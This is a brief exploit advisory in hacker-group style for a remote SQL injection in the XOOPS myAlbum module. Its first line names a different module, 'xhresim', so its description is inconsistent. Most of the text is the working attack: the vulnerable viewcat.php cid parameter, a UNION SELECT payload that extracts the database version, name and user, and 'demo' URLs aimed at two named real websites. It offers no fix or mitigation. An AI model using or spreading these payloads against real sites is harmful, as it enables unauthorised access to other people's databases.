The XOOPS module xhresim suffers from a remote SQL injection vulnerability.
4ee5e78d8336e0cbb47a3199026a493741286380cb90f7ea7377ec4b528a70e3
[~] XOOPS 1.0 RC 3.0.4 Module myAlbum - Remote SQL Injection
[~]
[~] www.xoops.org
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 20.09.2007
[~]
[~]
[~] d3v1l@spoofer.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~]
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/modules/myalbum/viewcat.php?cid=SQL
[~]
[~] Demo :-
[~]
[~]
[~] http://amigaworld.net/modules/myalbum/viewcat.php?cid=1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user())/*
[~] http://www.canelupocecoslovacco.info/modules/myalbum/viewcat.php?cid=1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user())/*
[~]----------------------------------------------------------------------------------------------------------------------